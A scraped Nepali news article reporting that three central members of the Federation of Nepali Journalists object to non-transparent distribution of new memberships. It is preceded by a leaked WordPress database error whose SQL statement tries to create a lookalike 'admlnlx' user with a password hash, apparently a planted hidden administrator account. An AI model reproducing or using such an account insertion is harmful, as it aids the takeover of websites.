WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5eTb77uuk9fw.yh37RI9uhp2Ps1bd0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 12:26:44', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २५ –
नयाँ सदस्यता वितरणको बिषयमा नेतृत्व अपारदर्शी भएको भन्दै नेपाल पत्रकार महासंघका केही केन्द्रीय सदस्यले आपत्ति जनाएका छन । तीन जना केन्द्रीय सदस्यले आज संयुक्त बिज्ञप्ति निकाल्दै जथाभावी सदस्यता वितरण गरिएको, सदस्यको सूची माग्दा नदिएको तथा केन्द्रीय समितिमा कुनै छलफल समेत नगरिएको भन्दै आपत्ति जनाएका हुन् ।
सदस्यहरु दीपेन्द्र कुँवर, रोशन पुरी र माधव दुलालले जारी गरेको विज्ञप्तिमा गैर पत्रकारले समेत महासंघको सदस्यता पाएको गुनासो बढीरहदा त्यसबारे केन्द्रीय सदस्यलाई नै जानकारी नदिइनु शंकास्पद भएको उल्लेख छ । नयाँ सदस्यको सूची केन्द्रीय समिति बैठकबाट पारित गरिनुपर्ने भएपनि त्यसो नगरी नियोजित रुपमा सोझै जिल्लामा पठाइएको विज्ञप्तिमा जनाइएको छ । उनीहरुले गैर पत्रकारलाई सदस्यता नदिन, श्रमजीवी पत्रकारलाई महासंघमा समेट्न तथा काम पारदर्शी ढङ्गले गर्न माग गरेका छन् ।